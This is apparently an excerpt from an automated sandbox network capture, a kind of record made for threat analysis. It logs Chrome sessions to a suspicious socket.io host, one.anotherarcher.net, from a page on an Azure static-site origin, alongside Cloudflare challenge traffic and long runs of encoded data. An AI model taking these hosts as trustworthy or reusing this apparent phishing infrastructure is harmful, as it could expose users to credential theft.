                                                                                                                                                                                                                                Data Ascii: u/S/su7jw+7z18/b6t3T5fz76wMN4ur85cgDGgUZDu3T3fHf6toOGQMnEAjg4SwjGRowMO8p8+YjGPcjKAwEEC0WCfg3FhNDRCcDNh0YFjpCBypREgk1TUVQUEclSU5PTB41VTMdOR5aOV0fXkgpLFg7Ly5EcWdsclBHamQ1Zk5HUlk6dWuFQ32AUFRmi11oXoZ9bG1ng02PameIYnVlT3ppn2mXX6BxpHaGk6SYd3afnm+rjoR8iI+KorO7i7m
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1369INData Raw: 64 66 76 39 4f 44 51 77 75 6b 41 39 75 76 5a 33 68 41 41 44 42 49 57 42 42 49 49 39 2f 49 4b 42 41 33 39 43 50 58 7a 44 42 48 38 37 4e 34 47 48 42 4d 49 39 76 6f 73 48 43 67 75 49 69 41 75 49 2b 2f 78 38 69 73 61 44 69 77 4b 50 69 37 34 45 41 30 61 47 44 63 42 4f 78 51 32 4f 41 41 4b 48 67 59 2f 49 43 59 65 44 54 30 7a 44 30 46 4c 51 52 4d 7a 54 6b 52 53 4a 31 77 79 4f 31 6c 4e 54 78 35 48 5a 46 4d 33 52 32 4e 57 4f 79 31 75 57 32 46 6c 59 30 5a 6f 64 54 46 5a 62 54 6f 79 58 56 74 31 66 57 6d 43 54 33 52 57 59 32 4b 43 61 59 6d 42 64 57 31 48 58 34 42 6b 62 34 42 2f 5a 6e 4e 79 55 57 6d 5a 65 6f 39 74 5a 33 36 63 62 70 46 36 6d 33 64 76 6d 4a 78 35 6d 59 71 64 66 5a 36 5a 70 49 4b 67 73 61 53 66 71 5a 4f 72 6d 48 4a 35 73 70 32 57 66 61 79 51 73 61 7a 41
                                                                                                                                                                                                                                Data Ascii: dfv9ODQwukA9uvZ3hAADBIWBBII9/IKBA39CPXzDBH87N4GHBMI9vosHCguIiAuI+/x8isaDiwKPi74EA0aGDcBOxQ2OAAKHgY/ICYeDT0zD0FLQRMzTkRSJ1wyO1lNTx5HZFM3R2NWOy1uW2FlY0ZodTFZbToyXVt1fWmCT3RWY2KCaYmBdW1HX4Bkb4B/ZnNyUWmZeo9tZ36cbpF6m3dvmJx5mYqdfZ6ZpIKgsaSfqZOrmHJ5sp2WfayQsazA
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1369INData Raw: 48 62 2f 50 63 42 34 75 72 68 42 2b 50 74 43 50 37 70 34 75 55 44 36 51 33 31 47 75 38 68 2f 52 66 30 37 68 41 5a 2b 42 6b 59 48 76 6b 48 35 43 44 39 43 79 41 69 42 76 34 67 4b 51 67 35 44 69 73 50 46 78 59 30 45 45 45 65 4e 52 49 66 46 6a 59 57 49 78 5a 47 48 52 63 65 50 69 46 41 53 44 51 6c 4c 79 4a 48 4b 7a 4e 45 53 69 34 6e 4d 6c 41 78 55 54 5a 5a 4d 6a 38 64 56 7a 6c 44 50 6d 41 36 52 6d 42 66 50 6d 42 6b 61 55 64 50 52 6c 39 49 65 56 70 71 54 6b 5a 77 63 55 35 61 64 48 35 55 68 56 5a 38 57 49 6c 57 67 56 70 6e 59 6e 35 68 6b 55 6d 45 5a 5a 56 6d 69 6d 5a 79 6a 48 78 73 6a 57 71 52 63 33 74 36 6c 48 56 2b 6d 4a 68 34 71 58 36 66 65 6f 64 36 71 6f 46 36 70 4b 57 46 70 59 36 66 69 4a 4f 57 71 6f 79 74 64 62 4b 51 6d 35 61 30 6c 4d 57 61 75 70 71 54 75
                                                                                                                                                                                                                                Data Ascii: Hb/PcB4urhB+PtCP7p4uUD6Q31Gu8h/Rf07hAZ+BkYHvkH5CD9CyAiBv4gKQg5DisPFxY0EEEeNRIfFjYWIxZGHRcePiFASDQlLyJHKzNESi4nMlAxUTZZMj8dVzlDPmA6RmBfPmBkaUdPRl9IeVpqTkZwcU5adH5UhVZ8WIlWgVpnYn5hkUmEZZVmimZyjHxsjWqRc3t6lHV+mJh4qX6feod6qoF6pKWFpY6fiJOWqoytdbKQm5a0lMWaupqTu
                                                                                                                                                                                                                                2024-10-03 20:57:20 UTC1369INData Raw: 51 43 67 59 46 46 41 7a 6f 38 64 67 49 36 51 33 63 45 75 37 35 32 42 62 31 46 53 51 58 2b 42 37 6b 46 78 34 63 4c 65 67 61 2f 67 59 71 4a 79 54 77 4a 67 63 4b 47 69 59 61 50 66 30 36 4b 7a 55 43 2f 53 55 6a 4f 44 45 37 4f 55 67 33 48 44 30 34 52 79 38 66 50 56 4d 30 56 69 51 33 4a 31 41 7a 47 69 77 38 47 56 70 51 4f 68 38 2f 55 53 38 33 47 54 74 4a 59 46 64 66 50 47 78 67 58 57 45 72 52 6b 4e 73 54 7a 5a 4a 53 44 56 32 62 55 59 37 57 32 31 4c 58 7a 56 58 5a 54 31 7a 65 31 69 49 66 33 6c 39 52 32 56 66 69 47 74 53 5a 55 39 52 6b 6f 6d 59 56 33 65 4a 5a 34 31 52 62 33 43 4e 6f 59 53 6c 6d 6f 5a 33 6d 58 61 56 66 61 32 4b 6e 4b 4f 77 73 70 4b 48 66 37 53 76 6c 34 65 6c 75 35 79 2b 6a 4a 65 50 75 4b 79 74 72 4c 71 77 76 70 69 35 74 4c 69 2f 7a 63 58 45 75 73
                                                                                                                                                                                                                                Data Ascii: QCgYFFAzo8dgI6Q3cEu752Bb1FSQX+B7kFx4cLega/gYqJyTwJgcKGiYaPf06KzUC/SUjODE7OUg3HD04Ry8fPVM0ViQ3J1AzGiw8GVpQOh8/US83GTtJYFdfPGxgXWErRkNsTzZJSDV2bUY7W21LXzVXZT1ze1iIf3l9R2VfiGtSZU9RkomYV3eJZ41Rb3CNoYSlmoZ3mXaVfa2KnKOwspKHf7Svl4elu5y+jJePuKytrLqwvpi5tLi/zcXEus


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                77192.168.2.44983779.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB3bm&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:21 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                78192.168.2.449838104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1438625525:1727987399:Ijto8JMFouAGt8YggseLV21TksqB395OrQnr3PCkYFY/8ccfd805a9cd425d/242f3f86f527414 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3138
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 242f3f86f527414
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC3138OUTData Raw: 76 5f 38 63 63 66 64 38 30 35 61 39 63 64 34 32 35 64 3d 4e 70 73 6f 53 6f 75 6f 70 6f 61 6f 47 2d 59 6b 2d 59 58 6f 2d 34 4d 55 25 32 62 44 2d 56 59 2b 59 4f 77 34 78 51 42 59 46 30 5a 59 42 42 2d 6d 59 37 59 49 34 56 55 4b 42 59 76 76 59 32 6f 59 55 59 4a 35 4b 2b 42 59 33 59 6d 42 4d 77 59 4e 52 55 51 66 59 4d 42 59 66 76 59 30 49 51 4b 43 2d 65 73 63 24 59 72 58 4c 57 32 61 72 4f 2d 54 59 71 59 6a 75 36 75 61 59 30 57 35 59 6e 59 4d 54 36 43 78 79 64 72 24 70 65 2d 37 42 4d 4f 63 2d 59 63 61 59 45 73 51 61 2b 46 35 4d 39 38 33 44 72 77 35 41 4e 55 6d 59 38 6c 77 59 6a 73 6a 2d 56 30 6d 59 63 38 54 59 76 55 75 59 2d 46 35 4f 66 59 59 4c 6f 2d 33 6c 4d 39 49 4e 4e 34 54 72 59 4d 24 59 56 70 59 6a 62 55 59 35 6f 24 38 59 76 54 59 2b 6f 34 59 4a 62 24 35
                                                                                                                                                                                                                                Data Ascii: v_8ccfd805a9cd425d=NpsoSouopoaoG-Yk-YXo-4MU%2bD-VY+YOw4xQBYF0ZYBB-mY7YI4VUKBYvvY2oYUYJ5K+BY3YmBMwYNRUQfYMBYfvY0IQKC-esc$YrXLW2arO-TYqYju6uaY0W5YnYMT6Cxydr$pe-7BMOc-YcaYEsQa+F5M983Drw5ANUmY8lwYjsj-V0mYc8TYvUuY-F5OfYYLo-3lM9INN4TrYM$YVpYjbUY5o$8YvTY+o4YJb$5
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:21 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 152108
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: lfBBwH1vgwdXY9Z14D40JAz7cZxjqUEICxMYYUdMW9k9WOWBtADJ33ubgtNOxshan3X8dmPEEkAqPMrIRJHUNu9Ys3zBsnPMfD09N497SssGDMqES6H9e+wiWZVzTKOdVHTPj+vdijXaoqUIDmkMCBkgB/2lhFfIDgBIJT5QQbYZqCww63Ud8DGGWVRbaQPcpymrfYcl8HsZbp8BUCz+w7NV3qqZON8OnREkieEvI0t+rpReAT42MEzC/wPAtA3Nd1b20Ruou4FEPn2RWpxfPXbQWQA7FVRPL63HxLlQB4uoJYV1uqJi3bzAoERdDWl7vbtlB/TTyxTLCPmB6uyyaqjDTRpZyw7fexnS42QxzVuXL7gBkMCGfNXGJyLtM92vHgcYu9hJ3TLP9KQFCjkI0nZ5yjpd0M+eGTsCjp83Hn6IG4xjREgnhWsI6/00LuKda59EV76By6bfO2tzAWjgApQC2ufqK8u0AFk9rRu0rxhlYag=$hnVSEFb35sIVjQ87
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd816a928428b-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC652INData Raw: 63 71 6c 32 64 34 74 2b 75 4b 31 37 72 4a 57 61 76 6f 47 33 77 4b 61 6e 71 4c 71 32 76 6f 71 43 6b 4b 62 45 7a 36 6d 78 71 35 4f 77 79 38 33 62 79 74 72 59 73 4a 37 54 7a 63 36 79 31 4a 2f 69 31 75 62 6f 76 4b 72 74 32 61 37 45 34 38 53 6d 73 38 72 6f 38 4d 48 6f 38 62 72 55 7a 4e 43 79 76 2b 7a 30 2b 4e 66 32 42 73 54 63 2b 2f 30 4a 33 51 38 47 78 76 34 50 2f 4f 54 53 42 39 49 46 36 77 6f 48 47 41 73 62 44 66 44 65 36 68 62 6b 2f 65 34 61 36 50 30 63 44 50 30 45 43 53 59 74 48 79 38 6c 42 66 4d 43 37 76 51 51 42 66 4c 34 45 7a 44 78 48 7a 38 62 2f 68 77 64 4f 51 44 36 42 79 68 4b 4c 55 59 2f 51 6b 55 61 44 41 39 48 49 43 46 4b 49 68 70 59 55 52 77 51 46 55 6b 33 49 57 41 37 59 47 4e 6a 57 31 4d 34 55 32 4a 6b 50 31 30 6d 54 31 4e 43 5a 79 34 74 4d 6a 68
                                                                                                                                                                                                                                Data Ascii: cql2d4t+uK17rJWavoG3wKanqLq2voqCkKbEz6mxq5Owy83bytrYsJ7Tzc6y1J/i1ubovKrt2a7E48Sms8ro8MHo8brUzNCyv+z0+Nf2BsTc+/0J3Q8Gxv4P/OTSB9IF6woHGAsbDfDe6hbk/e4a6P0cDP0ECSYtHy8lBfMC7vQQBfL4EzDxHz8b/hwdOQD6ByhKLUY/QkUaDA9HICFKIhpYURwQFUk3IWA7YGNjW1M4U2JkP10mT1NCZy4tMjh
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 70 47 46 59 58 5a 65 47 70 32 71 4e 72 4b 4f 51 72 4a 47 6d 6a 71 61 4f 6a 6f 75 33 72 71 64 36 68 49 79 64 6c 73 47 51 77 58 36 44 67 73 57 44 77 6f 57 31 78 4d 6d 6b 7a 71 6d 43 6a 71 53 64 6a 5a 2b 57 77 74 62 56 6d 72 57 6e 30 4a 65 36 33 35 37 42 32 61 4b 2b 76 39 66 6e 77 61 48 70 35 71 75 73 32 4e 72 65 36 65 7a 4c 38 4c 4f 77 30 71 2f 5a 30 39 50 6d 30 64 76 4e 37 4f 44 58 34 2f 37 55 30 4e 4c 33 33 63 58 67 79 2b 2f 49 78 67 77 4f 7a 41 2f 74 41 41 59 59 7a 77 54 4e 47 64 77 49 39 53 48 67 44 50 6e 75 35 42 44 39 41 2b 67 55 41 53 33 73 47 41 58 36 38 42 77 4a 44 2f 51 67 44 43 6e 34 4a 42 41 39 2f 43 67 55 43 77 45 73 47 42 38 46 4d 42 73 2b 47 67 63 6b 42 45 6c 49 4c 79 64 42 4d 6b 49 55 55 6a 49 35 4f 55 70 45 55 52 63 6e 47 30 73 5a 4b 30 46
                                                                                                                                                                                                                                Data Ascii: pGFYXZeGp2qNrKOQrJGmjqaOjou3rqd6hIydlsGQwX6DgsWDwoW1xMmkzqmCjqSdjZ+WwtbVmrWn0Je6357B2aK+v9fnwaHp5qus2Nre6ezL8LOw0q/Z09Pm0dvN7ODX4/7U0NL33cXgy+/IxgwOzA/tAAYYzwTNGdwI9SHgDPnu5BD9A+gUAS3sGAX68BwJD/QgDCn4JBA9/CgUCwEsGB8FMBs+GgckBElILydBMkIUUjI5OUpEURcnG0sZK0F
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 6d 57 70 62 48 5a 68 59 6d 64 72 63 61 2b 78 74 4c 53 55 6a 36 4b 6e 73 36 2b 64 66 48 4b 2b 6a 58 32 45 77 73 53 46 78 38 50 4a 6e 73 76 48 79 72 6e 42 78 4a 32 74 6a 64 44 41 6c 4b 58 46 70 64 75 59 73 62 2b 74 71 4e 75 35 33 62 66 5a 6f 4d 4f 31 79 73 6d 69 77 64 72 4e 70 73 54 79 30 61 72 49 72 4e 48 56 39 39 6e 45 35 2f 4b 36 75 66 54 66 79 74 7a 72 34 50 54 77 31 76 54 78 38 77 76 58 31 38 66 49 79 2b 34 51 34 67 6b 4a 35 67 41 44 34 39 4d 59 42 75 7a 59 48 41 6f 53 32 42 33 32 4a 68 41 69 35 2f 59 58 49 51 55 47 2b 66 6b 51 4b 68 51 42 35 6a 4d 77 4e 6a 54 76 4a 50 72 75 2f 43 67 55 43 77 45 73 47 42 38 46 4d 42 73 2b 47 67 63 6b 42 45 6c 49 4c 79 64 42 4d 6b 49 55 55 6a 4a 5a 46 79 52 63 56 78 55 6e 51 44 30 68 4c 55 45 77 48 53 56 46 4d 46 35 69
                                                                                                                                                                                                                                Data Ascii: mWpbHZhYmdrca+xtLSUj6Kns6+dfHK+jX2EwsSFx8PJnsvHyrnBxJ2tjdDAlKXFpduYsb+tqNu53bfZoMO1ysmiwdrNpsTy0arIrNHV99nE5/K6ufTfytzr4PTw1vTx8wvX18fIy+4Q4gkJ5gAD49MYBuzYHAoS2B32JhAi5/YXIQUG+fkQKhQB5jMwNjTvJPru/CgUCwEsGB8FMBs+GgckBElILydBMkIUUjJZFyRcVxUnQD0hLUEwHSVFMF5i
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 70 76 6a 71 52 2f 63 49 47 77 72 4b 6d 4e 74 35 78 35 65 5a 75 52 72 35 61 66 75 38 61 6c 75 6f 61 37 75 35 2f 41 69 72 66 45 79 49 36 38 6f 70 48 54 77 36 65 75 31 63 54 52 73 70 36 30 6d 70 6d 65 7a 37 4b 68 35 39 4f 32 71 61 6a 55 34 63 4b 71 32 37 33 74 37 66 48 41 30 39 2b 2f 2b 64 62 51 78 2f 76 75 37 64 72 30 2b 64 57 37 33 38 58 63 41 4f 45 4a 35 73 6a 38 41 41 72 5a 42 63 77 4b 33 64 37 50 34 73 34 57 47 77 62 54 46 64 63 49 47 76 50 68 38 78 67 64 37 51 62 30 2f 76 76 6a 41 2b 6b 6e 49 2b 34 6e 4b 52 41 67 41 69 6f 69 4b 66 54 32 37 43 72 33 4b 68 59 77 49 76 4d 76 46 50 5a 42 47 69 4d 48 41 54 73 73 52 43 67 67 4f 55 45 70 4d 46 4e 56 56 30 42 53 55 79 4d 6f 55 53 56 51 4b 6b 78 59 4f 42 35 59 57 53 5a 52 52 7a 56 64 56 57 64 72 4c 6a 31 51 57
                                                                                                                                                                                                                                Data Ascii: pvjqR/cIGwrKmNt5x5eZuRr5afu8aluoa7u5/AirfEyI68opHTw6eu1cTRsp60mpmez7Kh59O2qajU4cKq273t7fHA09+/+dbQx/vu7dr0+dW738XcAOEJ5sj8AArZBcwK3d7P4s4WGwbTFdcIGvPh8xgd7Qb0/vvjA+knI+4nKRAgAioiKfT27Cr3KhYwIvMvFPZBGiMHATssRCggOUEpMFNVV0BSUyMoUSVQKkxYOB5YWSZRRzVdVWdrLj1QW
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 6a 70 33 43 52 6e 4a 4f 75 64 6e 65 38 73 35 47 7a 74 34 47 57 73 72 4b 68 79 36 47 63 75 73 33 42 75 36 6d 30 6a 4e 43 31 69 5a 69 76 30 74 7a 5a 7a 72 36 71 75 64 2b 35 72 65 4f 67 76 62 72 6f 73 63 47 31 74 61 6e 45 35 39 44 68 36 63 37 70 36 50 50 6b 31 38 72 6e 35 63 75 39 75 65 6a 7a 2f 51 49 43 30 63 4c 76 30 65 6d 2f 43 63 6e 69 7a 41 33 69 32 39 7a 78 7a 76 49 56 46 38 30 50 38 51 58 78 39 78 30 51 43 51 6e 63 2b 50 30 65 41 42 34 68 38 68 51 71 38 77 77 41 35 77 6b 48 42 79 50 72 43 42 55 78 4d 79 51 53 42 44 41 79 46 7a 59 6f 38 6a 38 4e 2f 51 56 44 53 41 5a 49 52 45 6b 66 54 45 68 4f 49 31 42 4d 54 7a 35 47 53 53 49 79 45 6c 56 46 47 53 70 4b 4b 6d 41 64 4f 52 6c 4f 4d 32 56 6b 50 44 4e 6f 61 53 51 66 4f 53 67 39 62 69 38 2f 51 30 6f 30 54 46
                                                                                                                                                                                                                                Data Ascii: jp3CRnJOudne8s5Gzt4GWsrKhy6Gcus3Bu6m0jNC1iZiv0tzZzr6qud+5reOgvbroscG1tanE59Dh6c7p6PPk18rn5cu9uejz/QIC0cLv0em/CcnizA3i29zxzvIVF80P8QXx9x0QCQnc+P0eAB4h8hQq8wwA5wkHByPrCBUxMyQSBDAyFzYo8j8N/QVDSAZIREkfTEhOI1BMTz5GSSIyElVFGSpKKmAdORlOM2VkPDNoaSQfOSg9bi8/Q0o0TF
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 6d 35 2b 57 66 62 43 35 75 4d 57 32 66 33 2b 41 6d 73 44 47 70 34 47 6c 69 4c 32 65 72 64 4f 74 6f 74 62 4b 6c 4b 58 55 30 4b 6d 78 32 37 43 64 6e 4b 7a 58 30 4b 2f 6d 71 4c 71 36 32 75 66 61 74 2b 37 6a 77 72 50 79 70 2b 6a 50 2b 50 4c 57 72 64 4c 46 36 63 6e 63 37 2f 76 43 38 2f 76 54 77 66 7a 53 32 2b 54 5a 79 75 62 36 78 2f 45 43 35 64 77 50 46 64 49 44 7a 2b 55 4f 35 67 76 77 44 78 6a 30 47 39 73 53 46 78 54 35 32 75 41 54 2b 78 6a 70 48 51 6e 38 44 77 51 4b 4c 42 44 78 4c 43 30 4c 4b 52 58 30 50 43 6f 6f 39 67 34 72 44 52 70 46 4d 79 49 30 4e 68 63 69 54 69 70 50 43 56 41 6e 51 43 46 44 4b 53 49 6d 55 6b 30 77 4d 6c 51 38 47 6c 55 2b 4d 79 46 51 48 44 74 6e 4f 46 4a 55 51 6d 4d 36 4c 57 63 6f 53 47 4e 54 51 7a 30 31 52 6b 4a 54 51 6c 4a 50 56 55 35
                                                                                                                                                                                                                                Data Ascii: m5+WfbC5uMW2f3+AmsDGp4GliL2erdOtotbKlKXU0Kmx27CdnKzX0K/mqLq62ufat+7jwrPyp+jP+PLWrdLF6cnc7/vC8/vTwfzS2+TZyub6x/EC5dwPFdIDz+UO5gvwDxj0G9sSFxT52uAT+xjpHQn8DwQKLBDxLC0LKRX0PCoo9g4rDRpFMyI0NhciTipPCVAnQCFDKSImUk0wMlQ8GlU+MyFQHDtnOFJUQmM6LWcoSGNTQz01RkJTQlJPVU5
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 4c 4f 5a 77 36 69 46 68 61 61 64 71 61 4b 6f 75 35 36 78 6b 4d 7a 48 74 34 2b 55 31 71 79 30 79 39 4f 5a 6b 72 7a 61 6c 64 48 61 77 61 44 56 31 37 54 48 37 62 37 6f 78 4e 76 4d 70 4e 7a 67 39 66 66 74 2b 4d 58 71 79 2b 33 58 30 67 44 4a 37 64 66 56 37 38 50 64 2f 64 6a 42 44 41 54 2b 42 65 2f 48 45 51 38 4d 45 68 44 4c 41 4e 62 4b 32 41 54 76 35 74 77 49 38 2f 72 67 44 50 59 61 39 65 49 41 33 79 55 6b 43 77 4d 64 44 68 37 76 4c 67 37 37 2f 54 51 47 41 50 63 45 4d 6a 50 34 43 42 30 7a 41 51 30 69 45 45 41 32 4f 7a 73 39 50 69 55 33 53 45 6f 5a 4f 51 34 75 4d 53 77 39 45 46 4e 53 46 69 78 62 52 6b 30 75 47 31 73 59 58 56 78 45 4d 68 78 51 4a 31 55 70 56 44 39 69 50 69 74 49 4b 47 31 73 55 30 74 6c 56 6d 59 34 64 6c 5a 4b 62 46 55 2f 59 58 68 5a 54 56 64 44
                                                                                                                                                                                                                                Data Ascii: LOZw6iFhaadqaKou56xkMzHt4+U1qy0y9OZkrzaldHawaDV17TH7b7oxNvMpNzg9fft+MXqy+3X0gDJ7dfV78Pd/djBDAT+Be/HEQ8MEhDLANbK2ATv5twI8/rgDPYa9eIA3yUkCwMdDh7vLg77/TQGAPcEMjP4CB0zAQ0iEEA2Ozs9PiU3SEoZOQ4uMSw9EFNSFixbRk0uG1sYXVxEMhxQJ1UpVD9iPitIKG1sU0tlVmY4dlZKbFU/YXhZTVdD
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 6d 58 72 62 2f 41 78 72 43 66 6a 49 2b 53 6f 73 2b 73 79 39 65 70 6e 4e 71 78 75 4d 2f 58 6d 65 48 61 70 71 57 65 31 71 43 64 77 71 69 39 79 64 37 52 32 39 76 76 31 4c 47 75 35 72 44 6b 78 76 72 33 36 73 6f 42 77 4e 44 4f 41 2b 2f 64 30 64 48 46 34 41 4c 48 2f 51 33 35 79 76 33 62 38 64 48 50 33 76 44 35 46 4f 55 4f 47 66 4d 67 2f 76 72 63 46 42 63 59 42 77 4c 76 4a 65 6b 73 4a 78 73 6f 47 43 2f 39 44 7a 4d 55 4e 65 73 42 45 50 48 7a 44 76 51 32 45 45 41 37 51 45 49 42 50 44 6b 45 50 30 63 4a 52 51 6b 31 4b 79 70 4a 47 45 6b 70 55 53 4d 4f 45 51 30 69 4a 42 41 5a 45 6c 6f 63 54 42 38 34 47 42 34 69 59 45 39 6f 4a 6c 55 6f 49 52 35 45 4a 47 6c 74 62 55 6c 44 4d 58 5a 57 4d 30 35 36 4e 69 30 79 63 46 35 6f 65 31 51 36 63 48 6c 64 57 6c 52 58 67 46 32 45 68
                                                                                                                                                                                                                                Data Ascii: mXrb/AxrCfjI+Sos+sy9epnNqxuM/XmeHapqWe1qCdwqi9yd7R29vv1LGu5rDkxvr36soBwNDOA+/d0dHF4ALH/Q35yv3b8dHP3vD5FOUOGfMg/vrcFBcYBwLvJeksJxsoGC/9DzMUNesBEPHzDvQ2EEA7QEIBPDkEP0cJRQk1KypJGEkpUSMOEQ0iJBAZElocTB84GB4iYE9oJlUoIR5EJGltbUlDMXZWM056Ni0ycF5oe1Q6cHldWlRXgF2Eh
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC1369INData Raw: 4d 72 4d 43 6f 6c 4c 4b 6f 74 62 72 4a 7a 37 54 4c 31 37 2b 64 32 4c 4f 6c 35 4e 47 68 77 71 44 48 32 2b 6e 75 34 61 62 44 37 4c 50 66 30 4b 6a 67 35 50 6e 37 38 39 54 77 7a 4d 2f 78 32 39 59 45 33 66 48 62 32 66 50 47 41 38 50 6a 2f 75 33 69 45 4f 6e 36 33 65 77 49 43 4f 6e 77 43 67 50 37 31 66 62 31 38 68 45 57 47 41 4c 68 49 76 49 64 36 43 66 69 36 53 77 6f 4c 77 4d 77 4c 44 51 48 4e 44 41 31 43 7a 67 30 4f 67 38 38 4f 44 73 71 4d 6a 55 4f 48 76 31 42 4d 51 55 57 4e 68 5a 4d 43 53 49 46 44 79 67 70 44 54 41 69 53 54 59 50 4c 6b 4d 36 45 7a 4a 4c 50 68 63 31 59 30 49 62 4f 52 34 78 59 42 38 70 56 6c 56 64 53 46 6b 70 53 56 31 47 4d 55 34 30 55 6c 5a 32 62 46 4a 6f 64 46 77 36 63 7a 70 43 58 32 4a 33 65 56 68 6f 51 6e 31 62 68 6f 52 70 52 34 6c 6f 63 57
                                                                                                                                                                                                                                Data Ascii: MrMColLKotbrJz7TL17+d2LOl5NGhwqDH2+nu4abD7LPf0Kjg5Pn789TwzM/x29YE3fHb2fPGA8Pj/u3iEOn63ewICOnwCgP71fb18hEWGALhIvId6Cfi6SwoLwMwLDQHNDA1Czg0Og88ODsqMjUOHv1BMQUWNhZMCSIFDygpDTAiSTYPLkM6EzJLPhc1Y0IbOR4xYB8pVlVdSFkpSV1GMU40UlZ2bFJodFw6czpCX2J3eVhoQn1bhoRpR4locW


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                79192.168.2.44983979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:21 UTC643OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB47a HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
